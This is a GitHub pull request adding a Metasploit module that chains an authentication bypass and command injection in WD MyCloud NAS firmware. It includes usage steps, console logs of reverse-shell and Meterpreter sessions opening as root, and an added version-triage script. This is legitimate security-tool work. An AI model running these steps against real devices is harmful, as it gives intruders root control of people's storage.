Add wd_mycloud_unauthenticated_cmd_injection module and docs (CVE-2016-10108 and CVE-2018-17153) #18221

ErikWynter
Contributor

About

This change adds an exploit module for authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196.

Vulnerable Application

Western Digital MyCloud before 2.30.196. The module has been tested against 2.30.183.
Some notes:

  • Version 2.30.196 includes a patch for the authentication bypass (CVE-2018-17153). The command injection vector (CVE-2016-10108) should have been patched in 2.21.126. However, I tested these issues against version 2.30.183 and discovered that CVE-2016-10108 was still exploitable there, but only after leveraging the authentication bypass. This implies that the patch for CVE-2016-10108 did not actually remove the command injection vector, but only prevented unauthenticated access to it.
  • I was not able to test versions older than 2.21.126, but based on the available disclosures, CVE-2016-10108 should be exploitable without CVE-2018-17153 on those versions. However, since older versions will also be vulnerable to CVE-2018-17153, this module always chains exploits for both issues.

For more info, see:

Target Information

I only have temporary access to the target and I haven't found a way to install a vulnerable target myself. Because of that, I will email a spool file to the msfdev team. This file has output from running the module with HTTPTRACE for both targets. I've taken this approach in the past, so I hope that is sufficient.

That being said, I did find this post with download links for WD MyCloud versions, but the links to the firmware no longer seem to work. The links to the source code do work.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection
  3. Do: set RHOSTS [IP]
  4. Do: set LHOST [IP]
  5. Do: exploit

Options

TARGETURI

The base path to WD MyCloud. The default value is /.

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper

Scenarios

Western Digital MyCloud 2.30.183 - Unix In-Memory

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6000 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo tLD1sR3mLQXV1AYFuHV46x5...
[+] The target is vulnerable. The target executed the echo command.
[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
[*] Command shell session 1 opened (10.10.10.18:6000 -> 10.10.10.45:45402) at 2023-07-26 13:51:06 +0000
id
uid=0(root) gid=0(root) groups=0(root)
head /usr/local/config/config.xml
<config>
	<sw_ver_1>2.30.183</sw_ver_1>
	<sw_ver_2>2.30.183.0116.2018</sw_ver_2>
	<hw_ver>WDMyCloudEX4100</hw_ver>
	<eula>1</eula>
	<language>0</language>
	<registered>0</registered>
	<eula_fw>0</eula_fw>
	<eula_apps>0</eula_apps>
	<analytics>0</analytics>

Western Digital MyCloud 2.30.183 - Linux Dropper

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/armle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6001             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6001 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo gkmp1ak8jprpqinbvmN84QXaWfgirEt...
[+] The target is vulnerable. The target executed the echo command.
[*] Using URL: http://10.10.10.18:8080/xFQRlaZ5ODY9ZQa
[*] Client 10.10.10.45 (curl/7.42.1) requested /xFQRlaZ5ODY9ZQa
[*] Sending payload to 10.10.10.45 (curl/7.42.1)
[*] Sending stage (934728 bytes) to 10.10.10.45
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 2 opened (10.10.10.18:6001 -> 10.10.10.45:43738) at 2023-07-26 13:51:59 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.10.10.45
OS           :  (Linux 3.10.39)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
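The version notes above give two patch boundaries: 2.21.126 closed unauthenticated access to the CVE-2016-10108 injection (without removing the sink), and 2.30.196 fixed the CVE-2018-17153 bypass that re-exposes it. As an added example that is not part of this PR or of the Metasploit module, the Ruby script below turns those boundaries into a fleet-triage check and pulls the firmware version out of the `config.xml` layout shown in the session output. The `sw_ver_1` regex, the function names and the constructed sample XML are my assumptions; a version check of this kind only tells an operator which devices to update, whereas the module's own check probes the device with an `echo` command.

```ruby
# Added example (not from the PR or the module): triage a WD MyCloud firmware
# version against the patch boundaries described in the PR, and extract that
# version from the config.xml layout shown in the PR's session output.
require 'rubygems' # for Gem::Version (normally loaded by default)

# Fix boundaries as stated in the PR description.
CVE_2016_10108_UNAUTH_FIXED = Gem::Version.new('2.21.126') # unauthenticated route to the injection closed
CVE_2018_17153_FIXED        = Gem::Version.new('2.30.196') # authentication bypass patched

# Constructed sample, modelled on `head /usr/local/config/config.xml` in the PR.
SAMPLE_CONFIG_XML = <<~XML
  <config>
    <sw_ver_1>2.30.183</sw_ver_1>
    <sw_ver_2>2.30.183.0116.2018</sw_ver_2>
    <hw_ver>WDMyCloudEX4100</hw_ver>
  </config>
XML

# Pull the dotted firmware version out of the <sw_ver_1> element.
# (Assumption: sw_ver_1 is the short release version, as in the PR excerpt.)
def extract_sw_version(config_xml)
  m = config_xml.match(%r{<sw_ver_1>\s*([0-9]+(?:\.[0-9]+)+)\s*</sw_ver_1>})
  raise ArgumentError, 'sw_ver_1 not found in config.xml' unless m
  Gem::Version.new(m[1])
end

# Map a version onto the exposure the PR describes.
def triage(version)
  v = version.is_a?(Gem::Version) ? version : Gem::Version.new(version.to_s)
  {
    version: v.to_s,
    # Bypass present on every release before 2.30.196.
    cve_2018_17153_auth_bypass: v < CVE_2018_17153_FIXED,
    # Injection reachable without any bypass only before 2.21.126.
    cve_2016_10108_unauthenticated: v < CVE_2016_10108_UNAUTH_FIXED,
    # Per the PR, the injection sink survived 2.21.126 and is reachable again
    # through the bypass, so the unauthenticated chain works before 2.30.196.
    cve_2016_10108_reachable_via_bypass: v < CVE_2018_17153_FIXED,
  }
end

# True when the device is exposed to the unauthenticated chain this PR covers.
def exposed?(version)
  r = triage(version)
  r[:cve_2018_17153_auth_bypass] || r[:cve_2016_10108_unauthenticated]
end

if $PROGRAM_NAME == __FILE__
  v = extract_sw_version(SAMPLE_CONFIG_XML)
  puts "firmware #{v}: #{triage(v)}"
  puts(exposed?(v) ? 'update to 2.30.196 or later' : 'not affected by the chain in this PR')
end
```

On a fleet inventory, feed each device's `config.xml` through `extract_sw_version` and sort on `exposed?`; `Gem::Version` handles the dotted comparison so that 2.30.183 sorts below 2.30.196 rather than being compared as a string.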

@ErikWynter
Contributor Author

I will add docs later, but wanted to submit this ASAP since I only have access to my target for a limited time as mentioned (hopefully until Monday, but access may be cut off before).

@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks @ErikWynter for this module! It looks great! I just left a few comments. I also reviewed the HTTP trace you sent and it looks good. Please, can you also record a trace selecting the other target? I believe this one only shows the Linux Dropper target (Meterpreter session).

@ErikWynter
Contributor Author

ErikWynter commented Jul 27, 2023

Thanks @ErikWynter for this module! It looks great! I just left a few comments. I also reviewed the HTTP trace you sent and it looks good. Please, can you also record a trace selecting the other target? I believe this one only shows the Linux Dropper target (Meterpreter session).

@cdelafuente-r7 Thanks for the review! I'll try to get to these tonight. I double checked the HTTPTrace I sent but it already includes both targets. Lines 1-1136 show the Unix target and then I switched to the Linux Dropper.

@cdelafuente-r7
Contributor

Oh my bad! I got lost in the huge HTTP trace file and missed this. Thank you for the heads-up!

@ErikWynter
Contributor Author

@cdelafuente-r7 no worries, it was a ridiculously large trace file so I totally understand. I just pushed fixes for all the issues mentioned. I also fixed one print statement to be consistent with the others. It's working great:

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.10.18:7007
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] 10.10.10.45:443 - Attempting to execute echo hvUSLm4T4rFhTot2GP1u...
[+] The target is vulnerable. The target executed the echo command.
[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
[*] Command shell session 6 opened (10.10.10.18:7007 -> 10.10.10.45:34561) at 2023-07-27 20:16:50 +0000

id
uid=0(root) gid=0(root) groups=0(root)
background
Background session 6? [y/N]  y
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > set target 1
target => 1
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > set lport 7008
lport => 7008
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:7008
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] 10.10.10.45:443 - Attempting to execute echo yIYT4UlygJytKXnuWIgfFiUPJDEqPy86DgAdDGz8...
[+] The target is vulnerable. The target executed the echo command.
[*] Using URL: http://10.10.10.18:8081/PdniJ8Y
[*] Client 10.10.10.45 (curl/7.42.1) requested /PdniJ8Y
[*] Sending payload to 10.10.10.45 (curl/7.42.1)
[*] Sending stage (934728 bytes) to 10.10.10.45
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Meterpreter session 7 opened (10.10.10.18:7008 -> 10.10.10.45:41989) at 2023-07-27 20:19:09 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 10.10.10.45
OS           :  (Linux 3.10.39)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >                 

@ErikWynter
Contributor Author

btw I'll try and add the docs tomorrow

@cdelafuente-r7
Contributor

Thanks for updating this! Everything looks good to me now. I'll land it once the documentation is ready.

@ErikWynter
Contributor Author

@cdelafuente-r7 I just added the docs too. Please let me know if anything else is needed. :)

@cdelafuente-r7
Contributor

Everything looks good! I'll go ahead and land it. Thank you for your contribution!

@cdelafuente-r7 cdelafuente-r7 added the docs and rn-modules (release notes for new or majorly enhanced modules) labels and removed the needs-docs label Jul 28, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 0c1d945 into rapid7:master Jul 28, 2023
36 checks passed
@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerability in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage the authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.
